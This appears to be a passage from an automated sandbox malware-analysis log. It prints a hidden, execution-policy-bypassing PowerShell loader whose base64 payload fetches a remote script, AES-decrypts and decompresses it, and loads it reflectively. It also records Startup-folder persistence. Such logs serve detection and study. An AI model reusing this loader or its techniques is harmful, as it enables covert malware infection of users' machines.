WNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,7_2_004044A4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0044693D push ecx; ret 7_2_0044694D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0044DB70 push eax; ret 7_2_0044DB84
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0044DB70 push eax; ret 7_2_0044DBAC
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00451D54 push eax; ret 7_2_00451D61
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0044B090 push eax; ret 8_2_0044B0A4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0044B090 push eax; ret 8_2_0044B0CC
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00451D34 push eax; ret 8_2_00451D41
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00444E71 push ecx; ret 8_2_00444E81
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00414060 push eax; ret 9_2_00414074
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00414060 push eax; ret 9_2_0041409C
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00414039 push ecx; ret 9_2_00414049
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004164EB push 0000006Ah; retf 9_2_004165C4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00416553 push 0000006Ah; retf 9_2_004165C4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00416555 push 0000006Ah; retf 9_2_004165C4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_8b2957c5.cmdJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_8b2957c5.cmdJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_8b2957c5.cmd\:Zone.Identifier:$DATAJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4f0470de.cmd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4f0470de.cmd\:Zone.Identifier:$DATA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4d1fbf4c.cmd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4d1fbf4c.cmd\:Zone.Identifier:$DATA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e8e451c5.cmd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e8e451c5.cmd\:Zone.Identifier:$DATA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_ea7b3dab.cmd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_ea7b3dab.cmd\:Zone.Identifier:$DATA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_516e4705.cmd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_516e4705.cmd\:Zone.Identifier:$DATA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cdf83743.cmd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cdf83743.cmd\:Zone.Identifier:$DATA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_7b316f35.cmd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_7b316f35.cmd\:Zone.Identifier:$DATA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_0b65a00e.cmd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_0b65a00e.cmd\:Zone.Identifier:$DATA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6c687774.cmd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6c687774.cmd\:Zone.Identifier:$DATA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_03a3688f.cmd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_03a3688f.cmd\:Zone.Identifier:$DATA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_95d3f0d3.cmd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_95d3f0d3.cmd\:Zone.Identifier:$DATA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4e74002f.cmd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4e74002f.cmd\:Zone.Identifier:$DATA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6a9840ce.cmd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6a9840ce.cmd\:Zone.Identifier:$DATA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2a9205f0.cmd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2a9205f0.cmd\:Zone.Identifier:$DATA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,8_2_004047CB
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
